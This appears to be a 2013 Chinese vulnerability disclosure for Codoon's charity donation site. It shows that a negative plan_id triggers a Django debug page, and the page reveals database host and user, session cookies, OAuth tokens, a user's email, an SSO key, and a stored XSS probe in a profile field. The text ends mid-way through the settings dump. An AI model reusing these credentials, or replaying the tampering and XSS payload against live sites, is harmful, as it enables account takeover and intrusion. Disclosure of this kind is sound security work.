2013-08-03: 细节已通知厂商并且等待厂商处理中 2013-08-03: 厂商已经确认,细节仅向厂商公开 2013-08-13: 细节向核心白帽子及相关领域专家公开 2013-08-23: 细节向普通白帽子公开 2013-09-02: 细节向实习白帽子公开 2013-09-17: 细节向公众公开
泄露数据库和小部分源码
漏洞存在与捐献卡币时点捐献 plan_id 改为负值
DATABASES {'default': {'ENGINE': 'django.db.backends.mysql', 'HOST': 'rdsfviy3ifviy3i1367979506919.mysql.rds.aliyuncs.com', 'NAME': 'app_codoon', 'OPTIONS': {}, 'PASSWORD': '********************', 'PORT': '3306', 'TEST_CHARSET': None, 'TEST_COLLATION': None, 'TEST_MIRROR': None, 'TEST_NAME': None, 'TIME_ZONE': 'Asia/Shanghai', 'USER': 'aliyunmysql'}}
IntegrityError at /give_calcoin(1452, 'Cannot add or update a child row: a foreign key constraint fails (`app_codoon`.`commonweal_calcoinorder`, CONSTRAINT `codoon_plan_id_refs_id_6bd1254d` FOREIGN KEY (`codoon_plan_id`) REFERENCES `commonweal_codoonplan` (`id`))')Request Method: POSTRequest URL: http://gongyi.codoon.com/give_calcoinDjango Version: 1.3.1Exception Type: IntegrityErrorException Value: (1452, 'Cannot add or update a child row: a foreign key constraint fails (`app_codoon`.`commonweal_calcoinorder`, CONSTRAINT `codoon_plan_id_refs_id_6bd1254d` FOREIGN KEY (`codoon_plan_id`) REFERENCES `commonweal_codoonplan` (`id`))')Exception Location: /opt/python2.7.2/lib/python2.7/site-packages/MySQLdb/connections.py in defaulterrorhandler, line 36Python Executable: /opt/python2.7.2/bin/pythonPython Version: 2.7.2Python Path: ['/var/www/ncodoon/gongyi', '/opt/python2.7.2/lib/python2.7/site-packages/distribute-0.6.24-py2.7.egg', '/opt/python2.7.2/lib/python2.7/site-packages/pip-1.3.1-py2.7.egg', '/var/www/ncodoon/src/gevent', '/opt/python2.7.2/lib/python27.zip', '/opt/python2.7.2/lib/python2.7', '/opt/python2.7.2/lib/python2.7/plat-linux2', '/opt/python2.7.2/lib/python2.7/lib-tk', '/opt/python2.7.2/lib/python2.7/lib-old', '/opt/python2.7.2/lib/python2.7/lib-dynload', '/opt/python2.7.2/lib/python2.7/site-packages', '/opt/python2.7.2/lib/python2.7/site-packages/setuptools-0.6c11-py2.7.egg-info', '/var/www/ncodoon/gongyi', '/var/www/ncodoon']Server time: 星期五, 2 八月 2013 21:47:00 +0800Traceback Switch to copy-and-paste view /opt/python2.7.2/lib/python2.7/site-packages/django/core/handlers/base.py in get_response response = callback(request, *callback_args, **callback_kwargs) ... ▼ Local vars Variable Value exceptions <module 'django.core.exceptions' from '/opt/python2.7.2/lib/python2.7/site-packages/django/core/exceptions.pyc'> e IntegrityError(1452, 'Cannot add or update a child row: a foreign key constraint fails (`app_codoon`.`commonweal_calcoinorder`, CONSTRAINT `codoon_plan_id_refs_id_6bd1254d` FOREIGN KEY (`codoon_plan_id`) REFERENCES `commonweal_codoonplan` (`id`))') callback_args () receivers [(<function _rollback_on_exception at 0x1857d70>, None)] middleware_method <bound method AuthenticationMiddleware.process_request of <django.contrib.auth.middleware.AuthenticationMiddleware object at 0x1680b50>> self <django.core.handlers.wsgi.WSGIHandler object at 0x1632390> settings <django.conf.LazySettings object at 0x13b5e10> request <WSGIRequest GET:<QueryDict: {}>, POST:<QueryDict: {u'plan_id': [u'-1'], u'calcoin': [u'1']}>, COOKIES:{'Hm_lpvt_9cca1c462e3682d7fb991e5cf0c7382f': '1375451017', 'Hm_lvt_9cca1c462e3682d7fb991e5cf0c7382f': '1374217191,1375449009,1375449119,1375449162', 'sessionid': '2927ea2dce22f153cf094f1781672934'}, META:{'CONTENT_LENGTH': '20', 'CONTENT_TYPE': 'application/x-www-form-urlencoded', 'HTTP_ACCEPT': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8', 'HTTP_ACCEPT_ENCODING': 'gzip, deflate', 'HTTP_ACCEPT_LANGUAGE': 'zh-cn,zh;q=0.8,en-us;q=0.5,en;q=0.3', 'HTTP_CONNECTION': 'close', 'HTTP_COOKIE': 'Hm_lvt_9cca1c462e3682d7fb991e5cf0c7382f=1374217191,1375449009,1375449119,1375449162; Hm_lpvt_9cca1c462e3682d7fb991e5cf0c7382f=1375451017; sessionid=2927ea2dce22f153cf094f1781672934', 'HTTP_HOST': 'gongyi.codoon.com', 'HTTP_MANGO': 'TEST', 'HTTP_REFERER': 'http://gongyi.codoon.com/plan/1', 'HTTP_USER_AGENT': 'Mozilla/5.0 (Windows NT 5.1; rv:22.0) Gecko/20100101 Firefox/22.0', 'HTTP_X_REAL_IP': '122.225.175.91', 'HTTP_X_SCHEME': 'http', 'PATH_INFO': u'/give_calcoin', 'QUERY_STRING': '', 'REMOTE_ADDR': '127.0.0.1', 'REQUEST_METHOD': 'POST', 'SCRIPT_NAME': u'', 'SERVER_NAME': 'gongyi.codoon.com', 'SERVER_PORT': '80', 'SERVER_PROTOCOL': 'HTTP/1.0', 'wsgi.errors': <open file '<stderr>', mode 'w' at 0x7f4e2d698270>, 'wsgi.input': <_io.BytesIO object at 0x1e62bf0>, 'wsgi.multiprocess': True, 'wsgi.multithread': False, 'wsgi.run_once': False, 'wsgi.url_scheme': 'http', 'wsgi.version': (1, 0)}> callback <function _decorator at 0x1cc35f0> resolver <RegexURLResolver gongyi.urls (None:None) ^/> urlresolvers <module 'django.core.urlresolvers' from '/opt/python2.7.2/lib/python2.7/site-packages/django/core/urlresolvers.pyc'> callback_kwargs {} response None urlconf 'gongyi.urls' /var/www/ncodoon/gongyi/commonweal/decorators.py in _decorator return func(request, *args, **kwargs) ... ▼ Local vars Variable Value code None args () request <WSGIRequest GET:<QueryDict: {}>, POST:<QueryDict: {u'plan_id': [u'-1'], u'calcoin': [u'1']}>, COOKIES:{'Hm_lpvt_9cca1c462e3682d7fb991e5cf0c7382f': '1375451017', 'Hm_lvt_9cca1c462e3682d7fb991e5cf0c7382f': '1374217191,1375449009,1375449119,1375449162', 'sessionid': '2927ea2dce22f153cf094f1781672934'}, META:{'CONTENT_LENGTH': '20', 'CONTENT_TYPE': 'application/x-www-form-urlencoded', 'HTTP_ACCEPT': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8', 'HTTP_ACCEPT_ENCODING': 'gzip, deflate', 'HTTP_ACCEPT_LANGUAGE': 'zh-cn,zh;q=0.8,en-us;q=0.5,en;q=0.3', 'HTTP_CONNECTION': 'close', 'HTTP_COOKIE': 'Hm_lvt_9cca1c462e3682d7fb991e5cf0c7382f=1374217191,1375449009,1375449119,1375449162; Hm_lpvt_9cca1c462e3682d7fb991e5cf0c7382f=1375451017; sessionid=2927ea2dce22f153cf094f1781672934', 'HTTP_HOST': 'gongyi.codoon.com', 'HTTP_MANGO': 'TEST', 'HTTP_REFERER': 'http://gongyi.codoon.com/plan/1', 'HTTP_USER_AGENT': 'Mozilla/5.0 (Windows NT 5.1; rv:22.0) Gecko/20100101 Firefox/22.0', 'HTTP_X_REAL_IP': '122.225.175.91', 'HTTP_X_SCHEME': 'http', 'PATH_INFO': u'/give_calcoin', 'QUERY_STRING': '', 'REMOTE_ADDR': '127.0.0.1', 'REQUEST_METHOD': 'POST', 'SCRIPT_NAME': u'', 'SERVER_NAME': 'gongyi.codoon.com', 'SERVER_PORT': '80', 'SERVER_PROTOCOL': 'HTTP/1.0', 'wsgi.errors': <open file '<stderr>', mode 'w' at 0x7f4e2d698270>, 'wsgi.input': <_io.BytesIO object at 0x1e62bf0>, 'wsgi.multiprocess': True, 'wsgi.multithread': False, 'wsgi.run_once': False, 'wsgi.url_scheme': 'http', 'wsgi.version': (1, 0)}> token {u'access_token': u'bbcf72d399e17323684fc1d238b11051', u'expire_in': 93312000, u'refresh_token': u'53a5e2ec575f3d6751af3f7df6f4937e', u'scope': u'feeds messages user', u'token_type': u'bearer', u'user_id': u'45273fbc-8804-4d5b-b435-6225997a6d15'} error None func <function _decorator at 0x1cc3578> kwargs {} token_flag True /var/www/ncodoon/gongyi/commonweal/decorators.py in _decorator return func(request, *args, **kwargs) ... ▼ Local vars Variable Value args () request <WSGIRequest GET:<QueryDict: {}>, POST:<QueryDict: {u'plan_id': [u'-1'], u'calcoin': [u'1']}>, COOKIES:{'Hm_lpvt_9cca1c462e3682d7fb991e5cf0c7382f': '1375451017', 'Hm_lvt_9cca1c462e3682d7fb991e5cf0c7382f': '1374217191,1375449009,1375449119,1375449162', 'sessionid': '2927ea2dce22f153cf094f1781672934'}, META:{'CONTENT_LENGTH': '20', 'CONTENT_TYPE': 'application/x-www-form-urlencoded', 'HTTP_ACCEPT': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8', 'HTTP_ACCEPT_ENCODING': 'gzip, deflate', 'HTTP_ACCEPT_LANGUAGE': 'zh-cn,zh;q=0.8,en-us;q=0.5,en;q=0.3', 'HTTP_CONNECTION': 'close', 'HTTP_COOKIE': 'Hm_lvt_9cca1c462e3682d7fb991e5cf0c7382f=1374217191,1375449009,1375449119,1375449162; Hm_lpvt_9cca1c462e3682d7fb991e5cf0c7382f=1375451017; sessionid=2927ea2dce22f153cf094f1781672934', 'HTTP_HOST': 'gongyi.codoon.com', 'HTTP_MANGO': 'TEST', 'HTTP_REFERER': 'http://gongyi.codoon.com/plan/1', 'HTTP_USER_AGENT': 'Mozilla/5.0 (Windows NT 5.1; rv:22.0) Gecko/20100101 Firefox/22.0', 'HTTP_X_REAL_IP': '122.225.175.91', 'HTTP_X_SCHEME': 'http', 'PATH_INFO': u'/give_calcoin', 'QUERY_STRING': '', 'REMOTE_ADDR': '127.0.0.1', 'REQUEST_METHOD': 'POST', 'SCRIPT_NAME': u'', 'SERVER_NAME': 'gongyi.codoon.com', 'SERVER_PORT': '80', 'SERVER_PROTOCOL': 'HTTP/1.0', 'wsgi.errors': <open file '<stderr>', mode 'w' at 0x7f4e2d698270>, 'wsgi.input': <_io.BytesIO object at 0x1e62bf0>, 'wsgi.multiprocess': True, 'wsgi.multithread': False, 'wsgi.run_once': False, 'wsgi.url_scheme': 'http', 'wsgi.version': (1, 0)}> token {u'access_token': u'bbcf72d399e17323684fc1d238b11051', u'expire_in': 93312000, u'refresh_token': u'53a5e2ec575f3d6751af3f7df6f4937e', u'scope': u'feeds messages user', u'token_type': u'bearer', u'user_id': u'45273fbc-8804-4d5b-b435-6225997a6d15'} user {u'_auto_id': 1288778, u'address': u'', u'age': 13, u'birthday': {u'd': 1, u'm': 8, u'y': 2000}, u'certificateid': u'', u'certificateinfo': u'', u'certificatename': u'', u'descroption': u'\u201c><img src=1 onerror=alert(1);>', u'domain': u'~tc5v!i!', u'email': u'xiaoleboke@qq.com', u'emailverified': False, u'fighting_level': 0, u'followers': 0, u'followings': 2, u'gender': u'0', u'get_icon_large': u'http://static.codoon.com/image/default_header/female_l.png', u'get_icon_middle': u'http://static.codoon.com/image/default_header/female_m.png', u'get_icon_small': u'http://static.codoon.com/image/default_header/female_s.png', u'get_icon_tiny': u'http://static.codoon.com/image/default_header/female_t.png', u'get_icon_xlarge': u'http://static.codoon.com/image/default_header/female_x.png', u'group_ids': u'', u'height': 170, u'hobby': u'\u8dd1\u6b65', u'id': u'45273fbc-8804-4d5b-b435-6225997a6d15', u'installed_apps': u'CDN_JOURNAL CDN_WELFARE', u'is_newuser': False, u'last_login': 0, u'location': u'\u5317\u4eac ', u'mobile_portraits': [], u'mobile_portraits_l': [], u'mobile_portraits_x': [], u'mobilenumber': u'I1375449215156', u'mobileverified': False, u'nick': u'mango1995', u'portrait': u' ', u'realname': u' ', u'routes_count': 0, u'runstridelength': 90, u'stridelength': 50, u'tmp_portrait': u'', u'verify_code': u'c25553c5e99f427d8e35046eee52574b', u'week_goal_type': u'steps', u'week_goal_value': 70000, u'weight': 60.0} func <function give_calcoin at 0x1cc3500> kwargs {} /var/www/ncodoon/gongyi/commonweal/views.py in give_calcoin flag, result = interface.create_order(plan_id, user_id, calcoin, request.user.get('nick'), request.user.get('domain')) ... ▼ Local vars Variable Value urlencode <function urlencode at 0x1e9ea28> plan_id u'-1' request <WSGIRequest GET:<QueryDict: {}>, POST:<QueryDict: {u'plan_id': [u'-1'], u'calcoin': [u'1']}>, COOKIES:{'Hm_lpvt_9cca1c462e3682d7fb991e5cf0c7382f': '1375451017', 'Hm_lvt_9cca1c462e3682d7fb991e5cf0c7382f': '1374217191,1375449009,1375449119,1375449162', 'sessionid': '2927ea2dce22f153cf094f1781672934'}, META:{'CONTENT_LENGTH': '20', 'CONTENT_TYPE': 'application/x-www-form-urlencoded', 'HTTP_ACCEPT': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8', 'HTTP_ACCEPT_ENCODING': 'gzip, deflate', 'HTTP_ACCEPT_LANGUAGE': 'zh-cn,zh;q=0.8,en-us;q=0.5,en;q=0.3', 'HTTP_CONNECTION': 'close', 'HTTP_COOKIE': 'Hm_lvt_9cca1c462e3682d7fb991e5cf0c7382f=1374217191,1375449009,1375449119,1375449162; Hm_lpvt_9cca1c462e3682d7fb991e5cf0c7382f=1375451017; sessionid=2927ea2dce22f153cf094f1781672934', 'HTTP_HOST': 'gongyi.codoon.com', 'HTTP_MANGO': 'TEST', 'HTTP_REFERER': 'http://gongyi.codoon.com/plan/1', 'HTTP_USER_AGENT': 'Mozilla/5.0 (Windows NT 5.1; rv:22.0) Gecko/20100101 Firefox/22.0', 'HTTP_X_REAL_IP': '122.225.175.91', 'HTTP_X_SCHEME': 'http', 'PATH_INFO': u'/give_calcoin', 'QUERY_STRING': '', 'REMOTE_ADDR': '127.0.0.1', 'REQUEST_METHOD': 'POST', 'SCRIPT_NAME': u'', 'SERVER_NAME': 'gongyi.codoon.com', 'SERVER_PORT': '80', 'SERVER_PROTOCOL': 'HTTP/1.0', 'wsgi.errors': <open file '<stderr>', mode 'w' at 0x7f4e2d698270>, 'wsgi.input': <_io.BytesIO object at 0x1e62bf0>, 'wsgi.multiprocess': True, 'wsgi.multithread': False, 'wsgi.run_once': False, 'wsgi.url_scheme': 'http', 'wsgi.version': (1, 0)}> token {u'access_token': u'bbcf72d399e17323684fc1d238b11051', u'expire_in': 93312000, u'refresh_token': u'53a5e2ec575f3d6751af3f7df6f4937e', u'scope': u'feeds messages user', u'token_type': u'bearer', u'user_id': u'45273fbc-8804-4d5b-b435-6225997a6d15'} calcoin u'1' user_id u'45273fbc-8804-4d5b-b435-6225997a6d15' /var/www/ncodoon/gongyi/commonweal/interface.py in create_order value=value, order_num=create_order_num()) ... ▼ Local vars Variable Value nick u'mango1995' domain u'~tc5v!i!' user_id u'45273fbc-8804-4d5b-b435-6225997a6d15' value 1 plan_id u'-1' /opt/python2.7.2/lib/python2.7/site-packages/django/db/models/manager.py in create return self.get_query_set().create(**kwargs) ... ▼ Local vars Variable Value self <django.db.models.manager.Manager object at 0x1cc0cd0> kwargs {'codoon_plan_id': u'-1', 'order_num': '2013080221476uXE', 'user_domain': u'~tc5v!i!', 'user_id': u'45273fbc-8804-4d5b-b435-6225997a6d15', 'user_nick': u'mango1995', 'value': 1} /opt/python2.7.2/lib/python2.7/site-packages/django/db/models/query.py in create obj.save(force_insert=True, using=self.db) ... ▼ Local vars Variable Value self [<CalcoinOrder: CalcoinOrder object>, <CalcoinOrder: CalcoinOrder object>, <CalcoinOrder: CalcoinOrder object>, <CalcoinOrder: CalcoinOrder object>, <CalcoinOrder: CalcoinOrder object>, <CalcoinOrder: CalcoinOrder object>, <CalcoinOrder: CalcoinOrder object>, <CalcoinOrder: CalcoinOrder object>, <CalcoinOrder: CalcoinOrder object>, <CalcoinOrder: CalcoinOrder object>, <CalcoinOrder: CalcoinOrder object>, <CalcoinOrder: CalcoinOrder object>, <CalcoinOrder: CalcoinOrder object>, <CalcoinOrder: CalcoinOrder object>, <CalcoinOrder: CalcoinOrder object>, <CalcoinOrder: CalcoinOrder object>, <CalcoinOrder: CalcoinOrder object>, <CalcoinOrder: CalcoinOrder object>, <CalcoinOrder: CalcoinOrder object>, <CalcoinOrder: CalcoinOrder object>, '...(remaining elements truncated)...'] obj <CalcoinOrder: CalcoinOrder object> kwargs {'codoon_plan_id': u'-1', 'order_num': '2013080221476uXE', 'user_domain': u'~tc5v!i!', 'user_id': u'45273fbc-8804-4d5b-b435-6225997a6d15', 'user_nick': u'mango1995', 'value': 1} /opt/python2.7.2/lib/python2.7/site-packages/django/db/models/base.py in save self.save_base(using=using, force_insert=force_insert, force_update=force_update) ... ▼ Local vars Variable Value using 'default' self <CalcoinOrder: CalcoinOrder object> force_update False force_insert True /opt/python2.7.2/lib/python2.7/site-packages/django/db/models/base.py in save_base result = manager._insert(values, return_id=update_pk, using=using) ... ▼ Local vars Variable Value origin <class 'gongyi.commonweal.models.CalcoinOrder'> non_pks [<django.db.models.fields.related.ForeignKey object at 0x1cc05d0>, <django.db.models.fields.CharField object at 0x1cc0710>, <django.db.models.fields.CharField object at 0x1cc0790>, <django.db.models.fields.CharField object at 0x1cc0810>, <django.db.models.fields.CharField object at 0x1cc0890>, <django.db.models.fields.FloatField object at 0x1cc0910>, <django.db.models.fields.IntegerField object at 0x1cc0950>, <django.db.models.fields.DateTimeField object at 0x1cc0990>] f <django.db.models.fields.DateTimeField object at 0x1cc0990> self <CalcoinOrder: CalcoinOrder object> force_update False connection <django.db.backends.mysql.base.DatabaseWrapper object at 0x1870258> force_insert True raw False manager <django.db.models.manager.Manager object at 0x1cc0cd0> meta <Options for CalcoinOrder> values [(<django.db.models.fields.related.ForeignKey object at 0x1cc05d0>, -1), (<django.db.models.fields.CharField object at 0x1cc0710>, '2013080221476uXE'), (<django.db.models.fields.CharField object at 0x1cc0790>, u'45273fbc-8804-4d5b-b435-6225997a6d15'), (<django.db.models.fields.CharField object at 0x1cc0810>, u'mango1995'), (<django.db.models.fields.CharField object at 0x1cc0890>, u'~tc5v!i!'), (<django.db.models.fields.FloatField object at 0x1cc0910>, 1.0), (<django.db.models.fields.IntegerField object at 0x1cc0950>, 0), (<django.db.models.fields.DateTimeField object at 0x1cc0990>, u'2013-08-02 21:47:00')] pk_val None using 'default' pk_set False org None cls <class 'gongyi.commonweal.models.CalcoinOrder'> update_pk True record_exists False /opt/python2.7.2/lib/python2.7/site-packages/django/db/models/manager.py in _insert return insert_query(self.model, values, **kwargs) ... ▼ Local vars Variable Value self <django.db.models.manager.Manager object at 0x1cc0cd0> values [(<django.db.models.fields.related.ForeignKey object at 0x1cc05d0>, -1), (<django.db.models.fields.CharField object at 0x1cc0710>, '2013080221476uXE'), (<django.db.models.fields.CharField object at 0x1cc0790>, u'45273fbc-8804-4d5b-b435-6225997a6d15'), (<django.db.models.fields.CharField object at 0x1cc0810>, u'mango1995'), (<django.db.models.fields.CharField object at 0x1cc0890>, u'~tc5v!i!'), (<django.db.models.fields.FloatField object at 0x1cc0910>, 1.0), (<django.db.models.fields.IntegerField object at 0x1cc0950>, 0), (<django.db.models.fields.DateTimeField object at 0x1cc0990>, u'2013-08-02 21:47:00')] kwargs {'return_id': True, 'using': 'default'} /opt/python2.7.2/lib/python2.7/site-packages/django/db/models/query.py in insert_query return query.get_compiler(using=using).execute_sql(return_id) ... ▼ Local vars Variable Value raw_values False return_id True values [(<django.db.models.fields.related.ForeignKey object at 0x1cc05d0>, -1), (<django.db.models.fields.CharField object at 0x1cc0710>, '2013080221476uXE'), (<django.db.models.fields.CharField object at 0x1cc0790>, u'45273fbc-8804-4d5b-b435-6225997a6d15'), (<django.db.models.fields.CharField object at 0x1cc0810>, u'mango1995'), (<django.db.models.fields.CharField object at 0x1cc0890>, u'~tc5v!i!'), (<django.db.models.fields.FloatField object at 0x1cc0910>, 1.0), (<django.db.models.fields.IntegerField object at 0x1cc0950>, 0), (<django.db.models.fields.DateTimeField object at 0x1cc0990>, u'2013-08-02 21:47:00')] using 'default' query <django.db.models.sql.subqueries.InsertQuery object at 0x1dcf550> model <class 'gongyi.commonweal.models.CalcoinOrder'> /opt/python2.7.2/lib/python2.7/site-packages/django/db/models/sql/compiler.py in execute_sql cursor = super(SQLInsertCompiler, self).execute_sql(None) ... ▼ Local vars Variable Value self <django.db.backends.mysql.compiler.SQLInsertCompiler object at 0x1dcffd0> return_id True /opt/python2.7.2/lib/python2.7/site-packages/django/db/models/sql/compiler.py in execute_sql cursor.execute(sql, params) ... ▼ Local vars Variable Value cursor <django.db.backends.util.CursorDebugWrapper object at 0x1dcff90> self <django.db.backends.mysql.compiler.SQLInsertCompiler object at 0x1dcffd0> params (-1, '2013080221476uXE', u'45273fbc-8804-4d5b-b435-6225997a6d15', u'mango1995', u'~tc5v!i!', 1.0, 0, u'2013-08-02 21:47:00') result_type None sql 'INSERT INTO `commonweal_calcoinorder` (`codoon_plan_id`, `order_num`, `user_id`, `user_nick`, `user_domain`, `value`, `state`, `create_time`) VALUES (%s, %s, %s, %s, %s, %s, %s, %s)' /opt/python2.7.2/lib/python2.7/site-packages/django/db/backends/util.py in execute return self.cursor.execute(sql, params) ... ▼ Local vars Variable Value self <django.db.backends.util.CursorDebugWrapper object at 0x1dcff90> stop 1375451220.39204 start 1375451220.388513 params (-1, '2013080221476uXE', u'45273fbc-8804-4d5b-b435-6225997a6d15', u'mango1995', u'~tc5v!i!', 1.0, 0, u'2013-08-02 21:47:00') sql u'INSERT INTO `commonweal_calcoinorder` (`codoon_plan_id`, `order_num`, `user_id`, `user_nick`, `user_domain`, `value`, `state`, `create_time`) VALUES (-1, 2013080221476uXE, 45273fbc-8804-4d5b-b435-6225997a6d15, mango1995, ~tc5v!i!, 1.0, 0, 2013-08-02 21:47:00)' duration 0.003526926040649414 /opt/python2.7.2/lib/python2.7/site-packages/django/db/backends/mysql/base.py in execute return self.cursor.execute(query, args) ... ▼ Local vars Variable Value query 'INSERT INTO `commonweal_calcoinorder` (`codoon_plan_id`, `order_num`, `user_id`, `user_nick`, `user_domain`, `value`, `state`, `create_time`) VALUES (%s, %s, %s, %s, %s, %s, %s, %s)' self <django.db.backends.mysql.base.CursorWrapper object at 0x1dcf110> args (-1, '2013080221476uXE', u'45273fbc-8804-4d5b-b435-6225997a6d15', u'mango1995', u'~tc5v!i!', 1.0, 0, u'2013-08-02 21:47:00') e IntegrityError(1452, 'Cannot add or update a child row: a foreign key constraint fails (`app_codoon`.`commonweal_calcoinorder`, CONSTRAINT `codoon_plan_id_refs_id_6bd1254d` FOREIGN KEY (`codoon_plan_id`) REFERENCES `commonweal_codoonplan` (`id`))') /opt/python2.7.2/lib/python2.7/site-packages/MySQLdb/cursors.py in execute self.errorhandler(self, exc, value) ... ▼ Local vars Variable Value charset 'utf8' exc <class '_mysql_exceptions.IntegrityError'> self <MySQLdb.cursors.Cursor object at 0x1dcf150> args (-1, '2013080221476uXE', u'45273fbc-8804-4d5b-b435-6225997a6d15', u'mango1995', u'~tc5v!i!', 1.0, 0, u'2013-08-02 21:47:00') db <weakproxy at 0x1e6aaa0 to Connection at 0x1fdf3a0> value IntegrityError(1452, 'Cannot add or update a child row: a foreign key constraint fails (`app_codoon`.`commonweal_calcoinorder`, CONSTRAINT `codoon_plan_id_refs_id_6bd1254d` FOREIGN KEY (`codoon_plan_id`) REFERENCES `commonweal_codoonplan` (`id`))') query "INSERT INTO `commonweal_calcoinorder` (`codoon_plan_id`, `order_num`, `user_id`, `user_nick`, `user_domain`, `value`, `state`, `create_time`) VALUES (-1, '2013080221476uXE', '45273fbc-8804-4d5b-b435-6225997a6d15', 'mango1995', '~tc5v!i!', 1, 0, '2013-08-02 21:47:00')" /opt/python2.7.2/lib/python2.7/site-packages/MySQLdb/connections.py in defaulterrorhandler raise errorclass, errorvalue ... ▼ Local vars Variable Value errorclass <class '_mysql_exceptions.IntegrityError'> errorvalue IntegrityError(1452, 'Cannot add or update a child row: a foreign key constraint fails (`app_codoon`.`commonweal_calcoinorder`, CONSTRAINT `codoon_plan_id_refs_id_6bd1254d` FOREIGN KEY (`codoon_plan_id`) REFERENCES `commonweal_codoonplan` (`id`))') error (<class '_mysql_exceptions.IntegrityError'>, IntegrityError(1452, 'Cannot add or update a child row: a foreign key constraint fails (`app_codoon`.`commonweal_calcoinorder`, CONSTRAINT `codoon_plan_id_refs_id_6bd1254d` FOREIGN KEY (`codoon_plan_id`) REFERENCES `commonweal_codoonplan` (`id`))'))Request informationGETNo GET dataPOSTVariable Valueplan_id u'-1'calcoin u'1'FILESNo FILES dataCOOKIESVariable ValueHm_lvt_9cca1c462e3682d7fb991e5cf0c7382f '1374217191,1375449009,1375449119,1375449162'sessionid '2927ea2dce22f153cf094f1781672934'Hm_lpvt_9cca1c462e3682d7fb991e5cf0c7382f '1375451017'METAVariable ValueHTTP_X_SCHEME 'http'CONTENT_TYPE 'application/x-www-form-urlencoded'HTTP_REFERER 'http://gongyi.codoon.com/plan/1'wsgi.multithread FalseSCRIPT_NAME u''wsgi.input <_io.BytesIO object at 0x1e62bf0>REQUEST_METHOD 'POST'HTTP_HOST 'gongyi.codoon.com'PATH_INFO u'/give_calcoin'SERVER_PROTOCOL 'HTTP/1.0'QUERY_STRING ''HTTP_CONNECTION 'close'HTTP_X_REAL_IP '122.225.175.91'CONTENT_LENGTH '20'HTTP_USER_AGENT 'Mozilla/5.0 (Windows NT 5.1; rv:22.0) Gecko/20100101 Firefox/22.0'wsgi.version (1, 0)HTTP_COOKIE 'Hm_lvt_9cca1c462e3682d7fb991e5cf0c7382f=1374217191,1375449009,1375449119,1375449162; Hm_lpvt_9cca1c462e3682d7fb991e5cf0c7382f=1375451017; sessionid=2927ea2dce22f153cf094f1781672934'SERVER_NAME 'gongyi.codoon.com'REMOTE_ADDR '127.0.0.1'wsgi.run_once Falsewsgi.errors <open file '<stderr>', mode 'w' at 0x7f4e2d698270>wsgi.multiprocess TrueHTTP_ACCEPT_LANGUAGE 'zh-cn,zh;q=0.8,en-us;q=0.5,en;q=0.3'wsgi.url_scheme 'http'HTTP_MANGO 'TEST'SERVER_PORT '80'HTTP_ACCEPT 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8'HTTP_ACCEPT_ENCODING 'gzip, deflate'SettingsUsing settings module settingsSetting ValueUSE_L10N TrueUSE_THOUSAND_SEPARATOR FalseLANGUAGE_CODE 'zh-cn'ROOT_URLCONF 'gongyi.urls'MANAGERS ()SAE_MYSQL_USER 'aliyunmysql'DEFAULT_CHARSET 'utf-8'SERVER_DOMAIN 'xiaogd.com'STATIC_ROOT '/var/www/ncodoon/static_root_s'TEST_DATABASE_CHARSET NoneMESSAGE_STORAGE 'django.contrib.messages.storage.user_messages.LegacyFallbackStorage'DATABASE_HOST ''EMAIL_SUBJECT_PREFIX '[Django] 'SEND_BROKEN_LINK_EMAILS FalseURL_VALIDATOR_USER_AGENT 'Django/1.3.1 (http://www.djangoproject.com)'STATICFILES_FINDERS ('django.contrib.staticfiles.finders.FileSystemFinder', 'django.contrib.staticfiles.finders.AppDirectoriesFinder')SESSION_COOKIE_DOMAIN NoneSESSION_COOKIE_NAME 'sessionid'ADMIN_FOR ()TIME_INPUT_FORMATS ('%H:%M:%S', '%H:%M')DATABASES {'default': {'ENGINE': 'django.db.backends.mysql', 'HOST': 'rdsfviy3ifviy3i1367979506919.mysql.rds.aliyuncs.com', 'NAME': 'app_codoon', 'OPTIONS': {}, 'PASSWORD': '********************', 'PORT': '3306', 'TEST_CHARSET': None, 'TEST_COLLATION': None, 'TEST_MIRROR': None, 'TEST_NAME': None, 'TIME_ZONE': 'Asia/Shanghai', 'USER': 'aliyunmysql'}}TEST_DATABASE_NAME NoneFILE_UPLOAD_PERMISSIONS NoneFILE_UPLOAD_HANDLERS ('django.core.files.uploadhandler.MemoryFileUploadHandler', 'django.core.files.uploadhandler.TemporaryFileUploadHandler')DEFAULT_CONTENT_TYPE 'text/html'APPEND_SLASH TrueFIRST_DAY_OF_WEEK 0DATABASE_ROUTERS []YEAR_MONTH_FORMAT 'F Y'STATICFILES_STORAGE 'django.contrib.staticfiles.storage.StaticFilesStorage'CACHES {'default': {'BACKEND': 'django.core.cache.backends.locmem.LocMemCache', 'LOCATION': ''}}SERVER_EMAIL 'root@localhost'SESSION_COOKIE_PATH '/'USE_X_FORWARDED_HOST FalseIGNORABLE_404_ENDS ('mail.pl', 'mailform.pl', 'mail.cgi', 'mailform.cgi', 'favicon.ico', '.php')MIDDLEWARE_CLASSES ('django.middleware.common.CommonMiddleware', 'django.contrib.sessions.middleware.SessionMiddleware', 'django.contrib.auth.middleware.AuthenticationMiddleware')USE_I18N TrueTHOUSAND_SEPARATOR ','SECRET_KEY '********************'HOME_URL 'http://www.a.com/home'LANGUAGE_COOKIE_NAME 'django_language'FILE_UPLOAD_TEMP_DIR NoneTRANSACTIONS_MANAGED FalseLOGGING_CONFIG 'django.utils.log.dictConfig'TEMPLATE_LOADERS ('django.template.loaders.filesystem.Loader',)TEMPLATE_DEBUG TrueAUTHENTICATION_BACKENDS ('django.contrib.auth.backends.ModelBackend',)TEST_DATABASE_COLLATION NoneFORCE_SCRIPT_NAME NoneCACHE_BACKEND 'locmem://'SSO_KEY '12345678'DECIMAL_SEPARATOR '.'SESSION_COOKIE_SECURE FalseCSRF_COOKIE_DOMAIN NoneFILE_CHARSET 'utf-8'DEBUG TrueSESSION_FILE_PATH NoneDEFAULT_FILE_STORAGE 'django.core.files.storage.FileSystemStorage'INSTALLED_APPS ['django.contrib.sessions', 'gongyi.custom_tags', 'gongyi.demo', 'gongyi.commonweal', 'gongyi.common']LANGUAGES (('ar', 'Arabic'), ('az', 'Azerbaijani'), ('bg', 'Bulgarian'), ('bn', 'Bengali'), ('bs', 'Bosnian'), ('ca', 'Catalan'), ('cs', 'Czech'), ('cy', 'Welsh'), ('da', 'Danish'), ('de', 'German'), ('el', 'Greek'), ('en', 'English'), 